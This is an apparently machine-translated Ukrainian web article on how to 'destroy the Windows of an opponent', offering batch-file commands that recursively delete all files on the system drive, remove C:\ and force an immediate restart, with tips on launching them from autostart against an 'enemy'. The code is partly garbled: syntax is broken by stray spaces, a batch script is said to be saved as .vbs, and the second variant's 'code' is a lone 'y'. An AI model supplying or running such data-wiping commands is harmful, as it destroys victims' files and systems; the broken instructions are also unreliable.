Як знищити Windows

Як знищити Windows противника?

УВАГА.

Автор статті знімає з себе будь-яку відповідальність за неправомірне застосування або поширення ніженапісанное. Інформація надана лише для ознайомлення. Використовуйте його на свій страх і ризик. Спробуйте всі способи, краще – на віртуальній машині.

 Черговий трюк з Блокнотом і скриптом для Windows. Хоча на цей раз трюком назвати це не можна – це справжнісінький вірус за своєю дією. Подібні зловредів в мережі рідко гуляють. Він приведе систему противника до краху. Наполегливо рекомендую вам пробувати цей скрипт на віртуальній машині. Ще краще – не полінуватися і встановити на новоствореному розділі жорсткого диска свіжу операційну систему. щоб знищити Windows описаними способами.

Як знищити Windows. Варіант 1.

Суть коду. Він знищить системні файли Windows і викличе появу BSOD. Отже, пишемо Вірус Смерті. Ось синтаксис скрипта:

@echo off
del% systemdrive% \ *. * / f / s / q
shutdown -r -f -t 00

Збережіть цей файл під розширенням .vbs в будь-якому місці. Перед збереженням не закривайте його і переходите до наступного кроку. Замініть в назві Текстовий документ на Все файли (All files). Вірус запускається подвійним клацанням або як зазвичай з папки автозавантаження. Після завантаження системи користувач побачить синій екран смерті.

Також можна спробувати (замість другого рядка) таку команду:

del / f / s / q “C: \ *. *”

Деякі файли відмовляться віддалятися, так як вони можуть використовуватися в даний момент системою. Видалимо, що зможемо. Рядок набуде вигляду:

rd C: \ / s / q

Як завжди для такої папки, скрипт працювати не буде при запуску з Безпечного режиму.

Після певних роздумів і пошуків статтю вирішив продовжити. Ось ще кілька скриптів, які рознесуть систему вашого ворога в пух і прах.

Як знищити Windows. Варіант 2.

Напишемо bat файл. Як і у всіх подібних випадках відкриємо Блокнот і введемо такий код:

y

Зберігаємо в потрібному місці під будь-яким ім’ям, але з обов’язковим розширенням .bat.  Для “роботи” батника потрібен час. Результатом буде стирання даних на диску С. Для відновлення затертих даних доведеться вдаватися до послуг спеціалізованого програмного забезпечення або звертатися до навченим бійцям. У будь-якому випадку це витрачені час і нерви. Часом чималі гроші.

Поки все. Використовуйте правильно.

Успіхів.

Ссылка на основную публикацию